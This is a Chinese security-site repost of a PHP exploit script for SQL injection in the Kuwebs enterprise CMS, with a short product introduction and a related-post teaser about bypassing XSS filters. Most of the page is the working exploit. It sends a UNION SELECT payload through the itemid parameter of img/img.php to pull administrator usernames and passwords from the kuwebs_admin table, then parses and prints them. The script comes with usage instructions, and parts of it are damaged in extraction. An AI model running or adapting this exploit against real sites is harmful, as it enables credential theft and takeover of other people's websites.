kuwebs cms sql injection exp - 脚本漏洞

admin 2021年4月3日19:37:02评论34 views字数 186阅读0分37秒阅读模式

    By:匿名者

介绍:

    酷纬企业网站管理系统是酷纬信息开发的为企业网站提供一揽子解决方案的营销型网站系统,后台采用PHP+Mysql架构,内置企业简介模块、新闻模块、产品模块、图片模块、下载模块、在线留言模块、常见问题模块、友情链接模块。前台采用DIV+CSS,遵循SEO标准,通过模板或者定制为企业提供专业的营销型网站。

   官方请百度:kuwebs

以下是引用片段:

error_reporting(E_ERROR);
print_r('
+---------------------------------------------------------------------+
kuwebs cms sql injection exp
Home:


link:

+---------------------------------------------------------------------+
');

if ($argc
print_r('
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 cc
');
die();
}
ob_start();
$host = $argv[1];
$path= $argv[2];
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)n");
fwrite($sock, "GET /$path/img/img.php?lang=cn&itemid=58%20and%201=2%20union%20select%201,concat(0x6F756F757E,adminuser,0x2D,adminpassword,0x7E31),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+kuwebs_admin%20-- HTTP/1.1rn");
fwrite($sock, "Host: $hostrn");
fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2rn");
fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn");
fwrite($sock, "Accept-Language: zh-cn,zh;q=0.5rn");
fwrite($sock, "Connection: keep-alivernrn");
$headers = "";
while ($str = trim(fgets($sock, 1024)))
     $headers .= "$strn";
$body = "";
while (!feof($sock))
     $body .= fgets($sock, 1024);
fclose($sock);
ob_end_flush();
//print_r($body);
if (strpos($body, 'ouou') !== false) {
preg_match('/ouou~(.*?)~1/', $body, $arr);
$result=explode("-",$arr[1]);
print_r("Exploit Success! nusername:".$result[0]."npassword:".$result[1]."n");

}
else{
print_r("Exploit Failed! n");
}
?>

文章来源于lcx.cc:kuwebs cms sql injection exp - 脚本漏洞

相关推荐: 过滤了符号 和 / 该如何绕过进行 XSS 攻击?

过滤了符号 和 / 该如何绕过进行 XSS 攻击? 超威蓝猫 (‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮) | 2014-01-25 15:43 传入 输出 求大牛支招。 [原文地址] 各种吐槽: 1# 乌云 | 2014-01-25 15:45 …

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:37:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   kuwebs cms sql injection exp - 脚本漏洞https://cn-sec.com/archives/323918.html

发表评论

匿名网友 填写信息